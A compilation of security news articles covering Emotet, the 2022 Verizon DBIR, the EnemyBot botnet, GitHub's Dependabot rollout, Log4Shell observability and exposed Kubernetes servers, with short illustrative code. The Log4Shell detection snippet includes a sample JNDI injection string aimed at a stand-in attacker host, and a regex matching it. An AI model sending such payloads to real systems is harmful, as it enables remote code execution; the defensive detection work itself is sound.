Potent Emotet Variant Spreads Via Stolen Email Credentials

 

Description

Emotet’s resurgence in April seems to be the signal of a full comeback for what was once dubbed “the most dangerous malware in the world,” with researchers spotting various new malicious phishing campaigns using hijacked emails to spread new variants of the malware.

The “new and improved” version of Emotet is exhibiting a “troubling” behavior of effectively collecting and using stolen credentials, “which are then being weaponized to further distribute the Emotet binaries,” Charles Everette from Deep Instinct revealed in a blog post this week, citing research from HP Wolf Security’s latest threat insights blog.

“[Emotet] still utilizes many of the same attack vectors it has exploited in the past,” he wrote. “The issue is that these attacks are getting more sophisticated and are bypassing today’s standard security tools for detecting and filtering out these types of attacks.”

In April, Emotet malware attacks returned after a 10-month “spring break” with targeted phishing attacks linked to the threat actor known as TA542, which since 2014 has leveraged the Emotet malware with great success, according to a report by Proofpoint.

These attacks—which were being leveraged to deliver ransomware—came on the back of attacks in February and March hitting victims in Japan using hijacked email threads and then “using those accounts as a launch point to trick victims into enabling macros of attached malicious office documents,” Deep Instinct’s Everette wrote.

“Looking at the new threats coming from Emotet in 2022 we can see that there has been an almost 900 percent increase in the use of Microsoft Excel macros compared to what we observed in Q4 2021,” he wrote.

Emotet Rides Again

The attacks that followed in April targeted new regions beyond Japan and also demonstrated other characteristics signaling a ramp-up in activity and rise in sophistication of Emotet, Deep Instinct noted.

Emotet's operators, like other threat groups, continue to leverage CVE-2017-11882, a more than 20-year-old Office bug that was patched in 2017; nearly 20 percent of the samples that researchers observed exploited this flaw. The Microsoft Office memory-corruption vulnerability allows an attacker to execute arbitrary code.

Nine percent of the new Emotet threats observed had never been seen before, and 14 percent of the recent emails spreading the malware bypassed at least one email gateway security scanner before being captured, according to Deep Instinct.

Emotet still primarily uses phishing campaigns with malicious attachments as its delivery method of choice, with 45 percent of the malware detected using some type of Office attachment, according to Deep Instinct. Of these attachments, 33 percent were spreadsheets, 29 percent were executables and scripts, 22 percent were archives and 11 percent were documents.

Other notable changes in Emotet's latest incarnation include its use of 64-bit shellcode, as well as more advanced PowerShell and active scripts in attacks, according to Deep Instinct.

History of a Pervasive Threat

Emotet started its nefarious activity as a banking trojan in 2014, with its operators having the dubious honor of being one of the first criminal groups to provide malware-as-a-service (MaaS), Deep Instinct noted.

The trojan evolved over time to become a full-service threat-delivery mechanism, with the ability to install a collection of malware on victim machines, including information stealers, email harvesters, self-propagation mechanisms and ransomware. Indeed, Trickbot and the Ryuk and Conti ransomware groups have been habitual partners of Emotet, with the ransomware groups using the malware to gain initial entry onto targeted systems.

Emotet appeared to be put out of commission by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. But as often happens with cybercriminal groups, its operators have since regrouped and seem to be working once again at full power, researchers said.

In fact, in November 2021 when Emotet emerged again nearly a year after it went dark, it was on the back of its collaborator Trickbot. A team of researchers from Cryptolaemus, G DATA and AdvIntel separately observed the trojan launching a new loader for Emotet, signaling its return to the threat landscape.

3 Takeaways From the 2022 Verizon Data Breach Investigations Report

 

Description


Sometimes, data surprises you. When it does, it can force you to rethink your assumptions and second-guess the way you look at the world. But other times, data can reaffirm your assumptions, giving you hard proof they’re the right ones — and providing increased motivation to act decisively based on that outlook.

The 2022 edition of Verizon’s Data Breach Investigations Report (DBIR), which looks at data from cybersecurity incidents that occurred in 2021, is a perfect example of this latter scenario. This year’s DBIR rings many of the same bells that have been resounding in the ears of security pros worldwide for the past 12 to 18 months — particularly, the threat of ransomware and the increasing relevance of complex supply chain attacks.

Here are our three big takeaways from the 2022 DBIR, and why we think they should have defenders doubling down on the big cybersecurity priorities of the current moment.

1. Ransomware’s rise is reaffirmed

In 2021, it was hard to find a cybersecurity headline that didn’t somehow pertain to ransomware. It impacted some 80% of businesses last year and threatened some of the institutions most critical to our society, from primary and secondary schools to hospitals.

This year’s DBIR confirms that ransomware is the critical threat that security pros and laypeople alike believe it to be. Ransomware-related breaches increased by 13% in 2021, the study found — that’s a greater increase than we saw in the past 5 years combined. In fact, nearly 50% of all system intrusion incidents — i.e., those involving a series of steps by which attackers infiltrate a company’s network or other systems — involved ransomware last year.

While the threat has massively increased, the top methods of ransomware delivery remain the ones we’re all familiar with: desktop sharing software, which accounted for 40% of incidents, and email at 35%, according to Verizon’s data. The growing ransomware threat may seem overwhelming, but the most important steps organizations can take to prevent these attacks remain the fundamentals: educating end users on how to spot phishing attempts and maintain security best practices, and equipping infosec teams with the tools needed to detect and respond to suspicious activity.

2. Attackers are eyeing the supply chain

In 2021 and 2022, we've been using the term "supply chain" more than we ever thought we would. COVID-induced disruptions in the flow of commodities and goods caused lumber prices to skyrocket and automakers to run short on microchips.

But security pros have had a slightly different sense of the term on their minds: the software supply chain. Breaches from Kaseya to SolarWinds — not to mention the Log4j vulnerability — reminded us all that vendors’ systems are just as likely a vector of attack as our own.

Unfortunately, Verizon’s Data Breach Investigations Report indicates these incidents are not isolated events — the software supply chain is, in fact, a major avenue of exploitation by attackers. In fact, 62% of cyberattacks that follow the system intrusion pattern began with the threat actors exploiting vulnerabilities in a partner’s systems, the study found.

Put another way: If you were targeted with a system intrusion attack last year, it was almost twice as likely that it began on a partner’s network than on your own.

While supply chain attacks still account for just under 10% of overall cybersecurity incidents, according to the Verizon data, the study authors point out that this vector continues to account for a considerable slice of all incidents each year. That means it’s critical for companies to keep an eye on both their own and their vendors’ security posture. This could include:

  • Demanding visibility into the components behind software vendors’ applications
  • Staying consistent with regular patching updates
  • Acting quickly to remediate and emergency-patch when the next major vulnerability that could affect high numbers of web applications rears its head

3. Mind the app

Between Log4Shell and Spring4Shell, the past 6 months have jolted developers and security pros alike to the realization that their web apps might contain vulnerable code. This proliferation of new avenues of exploitation is particularly concerning given just how commonly attackers target web apps.

Compromising a web application was far and away the top cyberattack vector in 2021, accounting for roughly 70% of security incidents, according to Verizon’s latest DBIR. Meanwhile, web servers themselves were the most commonly exploited asset type — they were involved in nearly 60% of documented breaches.

More than 80% of attacks targeting web apps involved the use of stolen credentials, emphasizing the importance of user awareness and strong authentication protocols at the endpoint level. That said, 30% of basic web application attacks did involve some form of exploited vulnerability — a percentage that should be cause for concern.

“While this 30% may not seem like an extremely high number, the targeting of mail servers using exploits has increased dramatically since last year, when it accounted for only 3% of the breaches,” the authors of the Verizon DBIR wrote.

That means vulnerability exploits accounted for a 10 times greater proportion of web application attacks in 2021 than they did in 2020, reinforcing the importance of being able to quickly and efficiently test your applications for the most common types of vulnerabilities that hackers take advantage of.

Stay the course

For those who’ve been tuned into the current cybersecurity landscape, the key themes of the 2022 Verizon DBIR will likely feel familiar — and with so many major breaches and vulnerabilities that claimed the industry’s attention in 2021, it would be surprising if there were any major curveballs we missed. But the key takeaways from the DBIR remain as critical as ever: Ransomware is a top-priority threat, software supply chains need greater security controls, and web applications remain a key attack vector.

If your go-forward cybersecurity plan reflects these trends, that means you’re on the right track. Now is the time to stick to that plan and ensure you have tools and tactics in place that let you focus on the alerts and vulnerabilities that matter most.



EnemyBot Malware Targets Web Servers, CMS Tools and Android OS

 

Description

A rapidly evolving IoT malware dubbed “EnemyBot” is targeting content management systems (CMS), web servers and Android devices. Threat actor group “Keksec” is believed behind the distribution of the malware, according to researchers.

“Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,” AT&T Alien Labs reported in a recent post. “The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,” they added.

How EnemyBot Works

The Alien Labs research team found that the malware is made up of four main sections.

The first section is a Python script, ‘cc7.py’, used to download all dependencies and compile the malware for different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a shell script, “update.sh”, is created and used to spread the malware to vulnerable targets.

The second section is the main botnet source code, which includes all of the malware's functionality apart from the other components described here and incorporates source code from various other botnets that can be combined to perform attacks.

The third module is the obfuscation segment, “hide.c”, which is compiled and executed manually to encode and decode the malware's strings. A simple swap table is used to hide strings, and “each char is replaced with a corresponding char in the table,” according to researchers.
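To make that mechanism concrete, below is a minimal Python sketch of a swap-table string obfuscator of the kind the researchers describe; the table contents and function names are illustrative assumptions, not EnemyBot's actual "hide.c" code.

```python
# Minimal sketch of a swap-table string obfuscator, as described by the
# researchers. The table below is illustrative only; EnemyBot's real
# "hide.c" uses its own hard-coded table.
import string

PLAIN = string.ascii_letters + string.digits
# A toy "swap table": each character maps to another character in the table.
SWAPPED = PLAIN[::-1]

ENCODE_TABLE = str.maketrans(PLAIN, SWAPPED)
DECODE_TABLE = str.maketrans(SWAPPED, PLAIN)

def encode(s: str) -> str:
    """Replace each char with its counterpart in the swap table."""
    return s.translate(ENCODE_TABLE)

def decode(s: str) -> str:
    """Reverse the substitution to recover the original string."""
    return s.translate(DECODE_TABLE)

if __name__ == "__main__":
    hidden = encode("update.sh")
    print(hidden, decode(hidden))  # obfuscated form, then the original
```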

The last segment is a command-and-control (C2) component used to receive commands and payloads from attackers.

Further analysis by AT&T researchers revealed a new scanner function that hunts for vulnerable IP addresses, as well as an “adb_infect” function used to attack Android devices.

ADB, or Android Debug Bridge, is a command-line tool that allows you to communicate with an Android device.

“In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,” said the researcher.
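For illustration only, the benign Python sketch below (assuming the `adb` binary from the Android platform tools is on the PATH) shows how scripts issue ADB commands to an attached device or emulator; it simply lists devices and reads a build property, and is not EnemyBot code.

```python
# Benign illustration of driving ADB from a script (requires the Android
# platform-tools "adb" binary on the PATH). This only lists devices and
# queries a property; a CalledProcessError is raised if no device is attached.
import subprocess

def adb(*args: str) -> str:
    """Run an adb command and return its stdout."""
    result = subprocess.run(["adb", *args], capture_output=True, text=True, check=True)
    return result.stdout.strip()

if __name__ == "__main__":
    print(adb("devices"))  # enumerate connected devices/emulators
    print(adb("shell", "getprop", "ro.build.version.release"))  # Android version of the default device
```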

“Keksec’s EnemyBot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,” the researchers added.

The Linux-based EnemyBot botnet was first discovered by Securonix in March 2022, and Fortinet later published an in-depth analysis.

Vulnerabilities Currently Exploited by EnemyBot

The AT&T researchers released a list of vulnerabilities currently exploited by EnemyBot, some of which have not yet been assigned a CVE.

The list includes the Log4Shell vulnerabilities (CVE-2021-44228, CVE-2021-45046) and a flaw in F5 BIG-IP devices (CVE-2022-1388), among others. Some of the vulnerabilities, such as those in PHP Scriptcase and Adobe ColdFusion 11, have not yet been assigned CVEs.

“This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,” the researcher explained.

Recommended Actions

The Alien Labs researchers suggest several measures to protect against exploitation. Users are advised to use a properly configured firewall and to reduce the exposure of Linux servers and IoT devices to the internet.

They also recommend monitoring network traffic, scanning outbound ports and looking for suspicious bandwidth usage. Software should be updated automatically and patched with the latest security updates.

EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities

 

Description

A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).

“The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,” AT&T Alien Labs said in a technical write-up published last week. “Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.”

First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.

Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it’s made up of four different components -

  • A Python module to download dependencies and compile the malware for different OS architectures
  • The core botnet section
  • An obfuscation segment designed to encode and decode the malware’s strings, and
  • A command-and-control functionality to receive attack commands and fetch additional payloads

“In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command,” the researchers said, pointing to a new “adb_infect” function. ADB refers to Android Debug Bridge, a command-line utility used to communicate with an Android device.

Also incorporated is a new scanner function that’s engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.

Besides the Log4Shell vulnerabilities that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access (CVE-2022-22954), and F5 BIG-IP (CVE-2022-1388) as well as weaknesses in WordPress plugins like Video Synchro PDF.

Other weaponized security shortcomings are below -

  • CVE-2022-22947 (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway
  • CVE-2021-4039 (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware
  • CVE-2022-25075 (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router
  • CVE-2021-36356 (CVSS score: 9.8) - A remote code execution vulnerability in Kramer VIAware
  • CVE-2021-35064 (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAware
  • CVE-2020-7961 (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal

What’s more, the botnet’s source code has been shared on GitHub, making it widely available to other threat actors. “I assume no responsibility for any damages caused by this program,” the project’s README file reads. “This is posted under Apache license and is also considered art.”

"Keksec’s Enemybot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,’’ the researchers said.

“This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.”

How we use Dependabot to secure GitHub

 

Description

At GitHub, we draw on our own experience using GitHub to build GitHub. As an example of this, we use a number of GitHub Advanced Security features internally. This post covers how we rolled out Dependabot internally to keep GitHub’s dependencies up to date. The rollout was managed by our Product Security Engineering Team who work with engineers throughout the entire development lifecycle to ensure that they’re confident in shipping new features and products. We’ll cover some background about how GitHub’s internal security teams think about security tooling in general, how we approached the Dependabot rollout, and how we integrated Dependabot into our existing engineering and security processes.

Keeping our dependencies up to date is one of the easiest ways to keep GitHub’s systems secure. The issue of supply chain security has become increasingly obvious over the past few years, from the malicious flatmap-stream package to the more recent Log4Shell vulnerabilities. Dependabot alerts developers when a repository is using a software dependency with a known vulnerability. By rolling out Dependabot internally to all of our repositories, we can measure, and significantly reduce, our usage of software dependencies with known vulnerabilities.

How we approach new tools and processes

Within Product Security Engineering, we spend a lot of time thinking about how new security tools and processes may impact the day-to-day work of our engineers. We use a number of guiding principles when evaluating tools and designing a rollout plan. For example: Does the security benefit of this new process outweigh the impact on engineering teams? How do we roll this out incrementally and gather feedback? What are our expectations for engineers, and how do we clearly communicate these expectations?

For Dependabot in particular, some of these questions were easy to answer. Dependabot is a native feature of GitHub, meaning that it integrates with our engineers’ current workflows on GitHub.com. By better tracking the security of our software supply chain, we will keep GitHub and our users secure, which outweighs any potential impact on engineering teams.

We used a three-stage process to roll out Dependabot at GitHub: measuring the current state of Dependabot alerts, a staged rollout enabling Dependabot incrementally across the organization, and finally, a focus on remediating repositories with open Dependabot alerts.

Measurement

Our first aim was to accurately measure the current state of dependencies internally. We were not yet concerned with the state of any particular repository, but wanted to understand the general risk across the company. We did this by building internal tools to gather statistics about Dependabot alerts across the whole organization via the public GraphQL API. Getting this tooling in place early allowed us to gather metrics continuously and understand the general trends within GitHub before, during, and after the rollout.
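As an illustration of that kind of tooling (not GitHub's internal implementation), a minimal Python sketch that tallies open Dependabot alerts per repository through the public GraphQL API might look like the following; the organization login and token environment variable are placeholders.

```python
# Minimal sketch of collecting open Dependabot alert counts across an
# organization via the GitHub GraphQL API. Not GitHub's internal tooling;
# ORG and GITHUB_TOKEN are placeholders.
import os
import requests

ORG = "my-org"  # placeholder organization login
QUERY = """
query($org: String!, $cursor: String) {
  organization(login: $org) {
    repositories(first: 100, after: $cursor) {
      pageInfo { hasNextPage endCursor }
      nodes {
        name
        vulnerabilityAlerts(states: OPEN, first: 1) { totalCount }
      }
    }
  }
}
"""

def open_alert_counts() -> dict:
    headers = {"Authorization": f"bearer {os.environ['GITHUB_TOKEN']}"}
    cursor, counts = None, {}
    while True:
        resp = requests.post(
            "https://api.github.com/graphql",
            json={"query": QUERY, "variables": {"org": ORG, "cursor": cursor}},
            headers=headers,
        )
        resp.raise_for_status()
        repos = resp.json()["data"]["organization"]["repositories"]
        for repo in repos["nodes"]:
            counts[repo["name"]] = repo["vulnerabilityAlerts"]["totalCount"]
        if not repos["pageInfo"]["hasNextPage"]:
            return counts
        cursor = repos["pageInfo"]["endCursor"]

if __name__ == "__main__":
    counts = open_alert_counts()
    print(f"{sum(counts.values())} open alerts across {len(counts)} repositories")
```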

Dependabot, like other GitHub Advanced Security features, can be enabled for all repositories within an organization from the organization’s administration page. However, GitHub has several thousand repositories internally, and we were aware that enabling Dependabot organization-wide could have a large impact on teams. We mitigated this impact in two ways: a staged rollout and frequent company-wide communications.

Rollout

A staged rollout allowed us to gather feedback from an initial set of repository owners before proceeding with the organization-wide rollout. We use this approach internally for security tools within GitHub, as we believe that having to unship a new tool or process causes even more confusion across the company than a slower rollout. For Dependabot, we decided on enabling the feature initially on a subset of our most active repositories to ensure that we could gather useful feedback. We then expanded it to a larger subset, before finally enabling the feature organization-wide.

As a heavily-distributed company working asynchronously across multiple timezones, we used a mixture of GitHub Issues and GitHub Discussions to share new tools and processes with engineers. We aimed to answer, clearly and succinctly, the most important questions in our communications: What are we doing? Why are we doing this? When are we doing this? Lastly, what do I need to do? The last question was key. We made it clear that we were rolling out Dependabot organization-wide to understand our current risk and that, while we encourage repository owners to upgrade dependencies, we were not expecting every Dependabot alert to be fixed right away.

We also used these discussions as a touchpoint for other related tasks, such as encouraging teams to archive repositories if they are no longer in use. In organizations, there are always early adopters of new tools and features. Although we clearly laid out our incremental rollout plan, we also encouraged teams to enable Dependabot right away if it made sense for their repositories.

All in all, we made the initial ship to 200 repositories, followed up in 30 days with another 1,000 repositories, and enabled it organization-wide at the 45-day point from our initial ship. After enabling it organization-wide, we also used the "Automatically enabled for new repositories" feature to ensure that new repositories are following best practices by default.

Remediation

Once we had Dependabot enabled for all GitHub repositories, we could measure the trend of Dependabot alerts across the company. Using our tooling, we could see that the overall number of open alerts was broadly flat. We then switched our focus from measuring the current state to working with repository owners to upgrade our dependencies.

We managed this process through GitHub’s internal Service Catalog tool. This is the single source of truth within GitHub for services running inside GitHub and defines where a service is deployed, who owns the service, and how to contact them. The service concept is an abstraction over repositories. The Service Catalog only tracks repositories that are currently deployed inside GitHub, which is a small subset of repositories. By leveraging the Service Catalog, we could ensure that we focused our remediation efforts on repositories that are running in production, where a vulnerable dependency could present a risk to GitHub and our users.

Each service can have domain-specific metrics associated with it, and we built tooling to continuously pull Dependabot data via the GitHub REST API and upload it to the Service Catalog.

The Service Catalog allows us to assign service level objectives (SLOs) to individual metrics. We acknowledge that not all Dependabot alerts can be actioned immediately. Instead, we assign a realistic grace period for service owners to remediate Dependabot alerts before marking a metric as failing.
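As a rough sketch of how such a metric and grace-period check could be computed (this is not GitHub's actual Service Catalog integration), the Python example below pulls a repository's open Dependabot alerts from the public REST endpoint and flags the metric as failing if any alert is older than an assumed 30-day grace period.

```python
# Rough illustration of pulling open Dependabot alerts for one repository via
# the public "List Dependabot alerts for a repository" REST API and checking
# them against a grace-period SLO. The owner/repo names, token, and 30-day
# grace period are placeholder assumptions.
import os
from datetime import datetime, timedelta, timezone

import requests

GRACE_PERIOD = timedelta(days=30)  # assumed grace period before a metric fails

def open_alerts(owner: str, repo: str) -> list:
    resp = requests.get(
        f"https://api.github.com/repos/{owner}/{repo}/dependabot/alerts",
        params={"state": "open", "per_page": 100},
        headers={
            "Authorization": f"Bearer {os.environ['GITHUB_TOKEN']}",
            "Accept": "application/vnd.github+json",
        },
    )
    resp.raise_for_status()
    return resp.json()

def slo_failing(alerts: list) -> bool:
    """A service fails its SLO if any open alert is older than the grace period."""
    now = datetime.now(timezone.utc)
    for alert in alerts:
        created = datetime.fromisoformat(alert["created_at"].replace("Z", "+00:00"))
        if now - created > GRACE_PERIOD:
            return True
    return False

if __name__ == "__main__":
    alerts = open_alerts("my-org", "my-service")  # placeholders
    print("SLO failing" if slo_failing(alerts) else "SLO passing")
```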

At this point, the Service Catalog metrics showed that around one-third of services had Dependabot alerts that needed remediation. We then needed a process for prioritizing and managing the work of upgrading dependencies across the company. We decided to integrate with GitHub’s internal Engineering Fundamentals program. This takes a company-wide view of the various metrics in the Service Catalog that we consider the baseline for well-maintained, available, and secure services.

The program is all about prioritization: given the current set of services not meeting baseline expectations, what is the priority for service owners right now? Integrating Dependabot alerts into the program allows us to clearly communicate the priority of dependency upgrades against other foundational work. This also drove conversations around deprecation. Like all companies, we had a number of internal services that were currently, or soon to be, deprecated. By making these metrics clearly visible, we could quantify the risk of keeping these deprecated services running in production, which led service owners to reprioritize the work to fully shut down those services.

The cornerstone of GitHub’s Engineering Fundamentals program is a monthly synchronous meeting with engineering leadership and service owners. Every month, we define realistic goals for service owners to achieve in the next four weeks, then review progress against those goals. This allowed us to break down the nebulous task—fixing all open Dependabot alerts—into a clear set of tasks over a series of months. After integrating the Dependabot metrics with the program, we made it a focus for engineering teams for a whole quarter of the year, which allowed us to build momentum on upgrading dependencies for services.

Outcomes

Our focus on Dependabot alerts was a success. By leveraging the Engineering Fundamentals program, we increased the percentage of services with zero Dependabot alerts from 68% up to 81%. This represents roughly 50 core GitHub services remediated in just three months, including several services performing large Rails upgrades to ensure they are using the most recent version. As the Engineering Fundamentals program runs continuously, this was not a one-off piece of work. Rather, the program allows us to follow the Dependabot alert metrics over time and intervene if we see them trending in the wrong direction.

After trialing this approach with Dependabot, we have since incorporated other GitHub Advanced Security tools and features, such as CodeQL, into our Engineering Fundamentals program. By integrating more sources of security alerts, GitHub now has a more complete picture of the state of services across the company, which allows us to clearly prioritize work.

As an internal security team, GitHub’s Product Security Engineering Team faces many of the same challenges as our GitHub Enterprise users, and we use our experience to inform the design of GitHub features. Our emphasis on organization-wide metrics was a key part of measuring progress on this piece of work. That feedback has informed how we designed the Security Overview feature, which allows GitHub Enterprise users to easily see the current state of GitHub Advanced Security alerts across their organization.


Closing the Gap Between Application Security and Observability

 

Description


Infosec Insiders columnist Daniel Kaar, global director application security engineering at Dynatrace.

When it’s all said and done, application security pros may come to look upon the Log4Shell vulnerability as a gift.

Potentially one of the most devastating software flaws ever found, Log4Shell has justified scrutiny of modern security methods. It also turns out that too many people continue to think about security strictly in terms of fortifying network perimeters.

But in the still burgeoning age of cloud computing, Log4Shell also exposed the significant gap that exists between application security and observability. It’s still not widely known that observability makes systems safer.

Nearly six months after the emergence of Log4Shell, the large number of companies still suffering its effects is proof. It comes down to this: Insufficient vulnerability management and a lack of visibility have hobbled efforts to identify and patch third-party software and development environments.

As a result, millions of apps remain at risk. Analysts predict that Log4Shell fallout will linger for years.

Protection means securing complex, distributed and high-velocity cloud architectures. Achieving this requires companies to adopt a modern development stack, one that arms security managers with greater observability and superior vulnerability management.

Traditional Application Security Tools Leave Too Many Questions

Analysts and journalists have described Log4Shell — the software vulnerability in Apache Log4j 2 discovered in November 2021 — as potentially one of the most devastating vulnerabilities ever found. Some security experts said the software flaw “bordered on the apocalyptic.”

Lest we forget: The security industry isn’t in trouble because of any single vulnerability. That became clear in March, with the emergence of Spring4Shell, a critical vulnerability targeting Java’s popular Spring open-source framework.

Companies struggle to identify vulnerabilities because traditional detection methods are too plodding and inefficient, and they leave too many questions unanswered. In the past, security teams performed a static analysis known as software composition analysis (SCA) on code libraries to determine whether a vulnerability had affected their systems.

An SCA relies on scanning tools and manual procedures. Though they’re often effective, these methods are designed to identify vulnerabilities early in the development lifecycle, not to uncover vulnerabilities in code that is already in production.
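At its core, this kind of composition analysis amounts to matching a dependency manifest against known-vulnerable version ranges. The toy Python sketch below illustrates the idea; the advisory entries, manifest, and naive version parsing are made up for illustration.

```python
# Toy illustration of the core idea behind software composition analysis (SCA):
# match declared dependencies against known-vulnerable version ranges.
# The advisory data, manifest and naive version parsing are made up for illustration.

# Hypothetical advisory data: package -> (first fixed version, advisory id)
ADVISORIES = {
    "examplelib": ("2.17.1", "EXAMPLE-2021-0001"),
}

# Hypothetical pinned dependency manifest: package -> installed version
MANIFEST = {"examplelib": "2.14.0", "otherlib": "1.0.0"}

def parse(version: str) -> tuple:
    """Naive dotted-version parser; real SCA tools handle far richer version schemes."""
    return tuple(int(part) for part in version.split("."))

def scan(manifest: dict) -> list:
    findings = []
    for name, installed in manifest.items():
        if name in ADVISORIES:
            fixed_in, advisory = ADVISORIES[name]
            if parse(installed) < parse(fixed_in):
                findings.append(f"{name} {installed} is affected by {advisory}; upgrade to >= {fixed_in}")
    return findings

if __name__ == "__main__":
    for finding in scan(MANIFEST):
        print(finding)
```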

SCA tools are also known to produce numerous false positives, and they don’t provide vital detail, such as the potential impact of a vulnerability or whether the affected repository is in production or in a pre-production environment.

They also don’t provide much insight into which areas are most at risk or should be prioritized.

Application Security-enabled Observability in Hours, Not Months

The good news is that when Log4Shell struck, some security managers were prepared. Some, including Jeroen Veldhorst, chief technology officer at Avisi, a Netherlands-based software development and cloud service company, had adopted a modern cloud observability platform.

According to Veldhorst, the application security and observability solution deployed by Avisi automatically identified and provided an overview of Log4Shell-vulnerable systems in Avisi’s production environment. The tool performed another automated and important task: providing the Avisi team with a list of systems to remediate first.

In the past, following the discovery of a new vulnerability, Veldhorst’s team would spend precious time patching low-priority occurrences. They were essentially guessing. Occasionally, the affected library his team labored on wasn’t even in production.

“Since [the tool] scans our platform continuously, it could tell us if there was a vulnerability [in production],” Veldhorst said.

Avisi’s observability and application security tool enabled the security team to accelerate the response to Log4Shell. Instead of spending days, weeks, or even months trying to resolve the issue via traditional methods, Avisi managed to resolve Log4Shell instances on all its systems within hours.

Combining observability and application security capabilities enables companies to spend less time resolving the last attack and more time preparing to thwart the next one.

Companies wishing to obtain an effective and mature observability platform must ensure that any upgrade comes with three integral components:

Vulnerability Detection and Mitigation

  • Application security platforms should automatically provide a prioritized list of potentially affected systems and the degree of exposure, and give teams the ability to perform direct remediation. An application security remediation tracking screen for each vulnerability also helps security teams spot and highlight whether each affected process still has a vulnerability loaded. Once each instance is resolved, observability-enabled application security tools automatically close the vulnerability report and then reopen it if a new instance of the problem is detected.

Incident Detection and Response

  • Application security and observability capabilities can be used to set up Log4Shell-specific attack monitoring and incident detection. This quickly identifies Log4Shell log patterns (a minimal pattern-matching sketch follows below), and with the help of platform log analytics and alerting capabilities, teams can configure alerting mechanisms for attacks on their environments. Metrics and alerting systems also enable visibility into underlying code to quickly set up a dedicated alerting mechanism for any potential successful attacks on this critical vulnerability.
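A minimal version of that pattern matching might look like the Python sketch below; the regex covers only the plain `${jndi:...}` form seen in Log4Shell exploit attempts, whereas real detections also need to handle obfuscated variants.

```python
# Minimal sketch of flagging Log4Shell-style exploit strings in access or
# application logs. Real detections also need to handle obfuscated variants
# (nested lookups, ${lower:...}, URL encoding, etc.); this only catches the
# plain form.
import re

JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|corba|nis|nds|http)://", re.IGNORECASE)

def suspicious_lines(log_lines):
    """Yield log lines containing a plain JNDI lookup string."""
    for line in log_lines:
        if JNDI_PATTERN.search(line):
            yield line

if __name__ == "__main__":
    sample = [
        "GET /index.html 200",
        "GET /login?user=${jndi:ldap://attacker.example/a} 404",
    ]
    for hit in suspicious_lines(sample):
        print("ALERT:", hit.strip())
```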

Coordination and Communication

  • The chief information security officer, the security team, engineering teams, and customer support teams can use application security and observability platforms to set up multiple daily status updates until all systems have been patched against a major vulnerability. This enables swift coordination against and mitigation of potential risks to environments and clear communication to customers.

Although only a small number of vendors can supply all three, these tools and the added security they provide make them worth finding.

Through the continuous surveillance of an organization’s production environments, the appropriate AppSec tools can enable security teams to detect vulnerabilities such as Log4Shell and Spring4Shell in real-time and implement immediate remediation at scale.

380K Kubernetes API Servers Exposed to Public Internet

 

Description

More than 380,000 Kubernetes API servers allow some kind of access to the public internet, making the popular open-source container-orchestration engine for managing cloud deployments an easy target and broad attack surface for threat actors, researchers have found.

The Shadowserver Foundation discovered the access when it scanned the internet for Kubernetes API servers, of which there are more than 450,000, according to a blog post published this week.

In all, Shadowserver found 454,729 Kubernetes API servers; of these, 381,645 responded with “200 OK,” researchers said. These “open” API instances thus constitute nearly 84 percent of all the instances that Shadowserver scanned.

Moreover, most of the accessible Kubernetes servers (201,348, or nearly 53 percent) were found in the United States, according to the post.

While this response to the scan does not mean these servers are fully open or vulnerable to attacks, it does create a scenario in which the servers have an “unnecessarily exposed attack surface,” according to the post.

“This level of access was likely not intended,” researchers observed. The exposure also allows for information leakage on version and builds, they added.
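To illustrate the kind of version and build leakage involved, the Python sketch below probes a Kubernetes API server's unauthenticated `/version` endpoint; the server address is a placeholder, and such probes should only ever be run against infrastructure you are authorized to test.

```python
# Illustrative check of whether a Kubernetes API server leaks version/build
# information to unauthenticated clients. API_SERVER is a placeholder; only
# probe hosts you are authorized to test. verify=False mirrors the common
# self-signed-certificate case and is not a recommendation.
import requests

API_SERVER = "https://k8s.example.internal:6443"  # placeholder

def probe_version(base_url: str) -> None:
    resp = requests.get(f"{base_url}/version", timeout=5, verify=False)
    if resp.status_code == 200:
        info = resp.json()
        print(f"Exposed: gitVersion={info.get('gitVersion')} platform={info.get('platform')}")
    else:
        print(f"Not openly readable (HTTP {resp.status_code})")

if __name__ == "__main__":
    probe_version(API_SERVER)
```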

Cloud Under Attack

The findings are troubling given that attackers already increasingly have been targeting Kubernetes cloud clusters as well as using them to launch other attacks against cloud services. Indeed, the cloud historically has suffered from rampant misconfiguration that continues to plague deployments, with Kubernetes being no exception.

